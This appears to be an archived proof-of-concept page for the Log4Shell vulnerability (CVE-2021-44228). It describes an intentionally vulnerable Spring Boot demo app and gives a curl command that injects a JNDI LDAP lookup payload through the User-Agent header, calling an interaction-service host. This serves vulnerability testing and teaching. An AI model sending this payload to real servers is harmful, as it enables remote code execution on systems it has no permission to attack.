Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)
Readme
# Simple Spring Boot application which is vulnerable to Log4Shell (CVE-2021-44228)
* Changed default logging framework from logback to log4j2

Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. [interactsh-service](https://github.com/projectdiscovery/interactsh):
```
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
```
One should see DNS interaction at [app.interactsh.com](https://app.interactsh.com/).   

## Docker hub
Link to [Docker hub](https://hub.docker.com/r/korteke/log4shell-demo)
File Snapshot

[4.0K] /data/pocs/c7a65cc363db29b92a7c016e28aaae1afef43db1 ├── [ 281] Dockerfile ├── [9.6K] mvnw ├── [6.5K] mvnw.cmd ├── [1.6K] pom.xml ├── [ 546] README.md └── [4.0K] src └── [4.0K] main ├── [4.0K] java │   └── [4.0K] net │   └── [4.0K] kvak │   └── [4.0K] log4shell │   ├── [ 322] Log4shellApplication.java │   └── [ 678] RESTController.java └── [4.0K] resources ├── [ 44] application.properties ├── [ 643] banner.txt └── [ 691] log4j2.xml 7 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.